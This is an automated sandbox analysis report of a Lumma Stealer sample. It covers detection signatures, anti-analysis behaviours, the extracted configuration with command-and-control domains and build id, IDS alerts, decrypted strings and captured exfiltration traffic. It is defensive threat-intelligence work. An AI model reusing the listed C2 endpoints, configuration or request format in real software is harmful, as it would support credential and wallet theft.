Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1528876
MD5:f6573e376463c493395a0189bd5b6a54
SHA1:3e297be62c83074742fb4e6515fa80e700be85de
SHA256:1cd1a6c8b63ce8cf1ac0de34237bcbdac46f8c613536c7f1e7ad0091420def25
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5948 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F6573E376463C493395A0189BD5B6A54)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["mobbipenju.store", "bathdoomgaz.storec", "clearancek.site", "licendfilteo.sitec", "studennotediw.storec", "eaglepawnoy.storec", "dissapoiznw.storec", "spirittunek.storec"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:17.550359+020020546531A Network Trojan was detected192.168.2.649713104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:17.550359+020020498361A Network Trojan was detected192.168.2.649713104.21.53.8443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.893324+020020564771Domain Observed Used for C2 Detected192.168.2.6556741.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.824632+020020564711Domain Observed Used for C2 Detected192.168.2.6523361.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.871467+020020564811Domain Observed Used for C2 Detected192.168.2.6499091.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.856619+020020564831Domain Observed Used for C2 Detected192.168.2.6549381.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.916624+020020564731Domain Observed Used for C2 Detected192.168.2.6511631.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.838524+020020564851Domain Observed Used for C2 Detected192.168.2.6500361.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.904220+020020564751Domain Observed Used for C2 Detected192.168.2.6587221.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-08T11:18:14.881616+020020564791Domain Observed Used for C2 Detected192.168.2.6611191.1.1.153UDP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.5948.1.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["mobbipenju.store", "bathdoomgaz.storec", "clearancek.site", "licendfilteo.sitec", "studennotediw.storec", "eaglepawnoy.storec", "dissapoiznw.storec", "spirittunek.storec"], "Build id": "4SD0y4--legendaryy"}
    Multi AV Scanner detection for domain / URL
    Source: sergei-esenin.comVirustotal: Detection: 11%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 13%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 13%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 13%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 17%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 13%Perma Link
    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 13%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.stor
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.stor
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.stor
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.stor
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.stor
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.stor
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000001.00000002.2230232687.0000000000A81000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49711 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00AC50FA
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00A8D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00A8D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh1_2_00AC63B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00AC5700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh1_2_00AC99D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h1_2_00AC695B
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_00A8FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_00AC6094
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]1_2_00A96F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then dec ebx1_2_00ABF030
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, dword ptr [edx]1_2_00A81000
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h1_2_00AC4040
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]1_2_00AAD1E1
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]1_2_00A942FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx1_2_00AA2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], ax1_2_00AA2260
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]1_2_00AB23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]1_2_00AB23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]1_2_00AB23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [edi], al1_2_00AB23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+30h]1_2_00AB23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+14h]1_2_00AB23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax1_2_00A8A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh1_2_00AC64B8
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]1_2_00AAE40C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h1_2_00A9B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]1_2_00AAC470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]1_2_00AC1440
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00A9D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]1_2_00A88590
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh1_2_00AC7520
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]1_2_00A96536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00AA9510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]1_2_00AAE66A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00ABB650
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]1_2_00AAD7AF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]1_2_00AC67EF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [edi+eax]1_2_00AC7710
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], dx1_2_00AA28E9
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]1_2_00A849A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h1_2_00AC3920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h1_2_00A9D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax1_2_00A91ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax1_2_00A91A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h1_2_00AC4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]1_2_00A85A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_00AB0B80
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]1_2_00A91BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]1_2_00A93BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+000006B8h]1_2_00A9DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h1_2_00A9DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh1_2_00AC9B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax1_2_00AAAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], ax1_2_00AAAC91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00AC9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh1_2_00AC9CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h1_2_00AACCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00AACCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h1_2_00AACCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh1_2_00ABFC20
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h1_2_00AA7C00
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [eax+esi+02h], 0000h1_2_00AAEC48
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00AC8D8A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]1_2_00AADD29
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh1_2_00AAFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]1_2_00A86EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h1_2_00A96EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]1_2_00A8BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]1_2_00A91E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]1_2_00A90EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, ecx1_2_00A94E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00AA7E60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00AA5E70
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ebx, word ptr [ecx]1_2_00AAAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]1_2_00A96F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h1_2_00AC7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00AC7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [edx], 0000h1_2_00A9FFDF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_00A88FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp ecx1_2_00AC5FD6
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax1_2_00AA9F62
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_00ABFF70

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.6:58722 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.6:54938 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.6:49909 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.6:61119 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.6:50036 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.6:51163 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.6:55674 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.6:52336 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49713 -> 104.21.53.8:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.53.8:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: bathdoomgaz.storec
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: licendfilteo.sitec
    Source: Malware configuration extractorURLs: studennotediw.storec
    Source: Malware configuration extractorURLs: eaglepawnoy.storec
    Source: Malware configuration extractorURLs: dissapoiznw.storec
    Source: Malware configuration extractorURLs: spirittunek.storec
    Source: Joe Sandbox ViewIP Address: 104.21.53.8 104.21.53.8
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
    Source: file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219908926.0000000001596000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
    Source: file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000001.00000003.2219908926.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.00000000015E9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.2219888407.0000000001628000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2231066264.0000000001620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
